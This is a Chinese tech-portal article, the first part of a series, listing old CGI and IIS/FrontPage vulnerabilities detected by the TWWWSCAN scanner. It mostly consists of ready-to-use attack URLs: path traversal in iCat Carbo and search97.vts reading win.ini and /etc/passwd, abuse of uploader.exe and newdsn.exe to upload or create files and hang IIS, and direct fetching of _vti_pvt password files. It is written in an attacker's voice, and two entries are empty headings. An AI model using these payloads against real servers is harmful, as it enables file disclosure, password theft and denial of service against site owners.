科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道TWWWSCAN漏洞扫描器CGI漏洞攻击(1)

TWWWSCAN漏洞扫描器CGI漏洞攻击(1)

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

iCat Carbo服务器一个网络购物程序,它被 PC杂评为最好的网络购物软件.安全专家Mikael Johansson发现 iCat Carbo服务器版本 3.0.0.中存在一个漏洞,这个漏洞让我们每个人查看系统中的任何文件在。
  • 评论
  • 分享微博
  • 分享邮件

  1.carbo.dll

  iCat Carbo服务器一个网络购物程序,它被 PC杂评为最好的网络购物软件.安全专家Mikael Johansson发现 iCat Carbo服务器版本 3.0.0.中存在一个漏洞,这个漏洞让我们每个人查看系统中的任何文件在(除文件之外和一些特殊字符).

  攻击方法:

  提交这样的http请求 :

  http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog

  http会做如下回应:

  [iCat Carbo Server(ISAPI, Release) Version 3.0.0 Release Build 244]

  Error: (-1007) cannot open file 'C:\web\carbohome\file_to_view.htm'

  查看win.ini文件: c:\winnt\win.ini:

  http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog

  ____________________________________________________________________

  2.uploader.exe

  如果您使用NT作为您的WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件。

  攻击方法: http://host/cgi-win/uploader.exe

  会带你到上传页面,剩下的事就不用我告诉你了把?:)

  ____________________________________________________________________

  3.search97.vts

  这个文件将能使入侵者任意的读取你系统中启动httpd用户能读取的文件。

  攻击方法: http://www.xxx.com/search97.vts

  HLNavigate=On&querytext=dcm

  &ServerKey=Primary

  &ResultTemplate=../../../../../../../etc/passwd

  &ResultStyle=simple

  &ResultCount=20

  &collection=books

  ________________________________________________________________________

  4.newdsn.exe

  个存在于/scripts/tools目录下的newdsn.exe文件允许任何一个用户在web根目录下创建任何文件。另外,在某些特定条件下,利用newdsn.exe可能使IIS遭受拒绝服务攻击,如果攻击成功,将导致IIS停止响应连接请求。

  攻击方法:

  1. 创建文件:http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=

  Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Evil2+samples+from+

  microsoft&dbq=..%2F..%2Fwwwroot%2Fevil2.htm&newdb=CREATE_DB&attr=

  2. D.o.s攻击:提交下列连接请求:

  http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase

  如果IIS是有问题的版本,浏览器将不会显示任何信息。当下列两种情况中的任意一种发生时,都会导致拒绝服务:

  - 重新启动WWW服务时: 这将导致IIS挂起。不能重新启动WWW服务,总是显示"端口已经被占用"的错误信息。

  - 停止WWW服务: IIS将会停止 。但是IIS的数据库部分并没有死掉,仍然会响应80端口发来的请求,因此,如果再次提交一个请求: http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase

  IIS会产生保护性错误。

  ________________________________________________________________________

  5.getdrvs.exe

  ______________________________________________________________________

  6. _vti_inf.html

  ______________________________________________________________________

  7. service.pwd http://www.hostname.com/_vti_pvt/service.pwd可读,将暴露用户密码信息.

  攻击方法:

  访问http://host/_vti_pvt/service.pwd [service.pwd]正是所需要的密码文件,如果我们粗心的网管没有设置权限的话,那浏览器就会显示出对方的密码文件。

  ________________________________________________________________

  8.users.pwd

  UNix系统的http://www.hostname.com/_vti_pvt/users.pwd可读,将暴露用户密码信息。

  攻击方法:

  访问http://www.hostname.com/_vti_pvt/users.pwd。

  _______________________________________________________________________

  9.authors.pwd

  UNix系统的http://www.hostname.com/_vti_pvt/authors.pwd可读,将暴露用户密码信息。

  攻击方法:

  访问http://www.hostname.com/_vti_pvt/authors.pwd。

  ___________________________________________________________________

  10.administrators.pwd

  UNix系统的http://www.hostname.com/_vti_pvt/administrators.pwd可读,将暴露用户密码信息。

  攻击方法:

  访问http://www.hostname.com/_vti_pvt/administrators.pwd。

  _____________________________________________________________

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章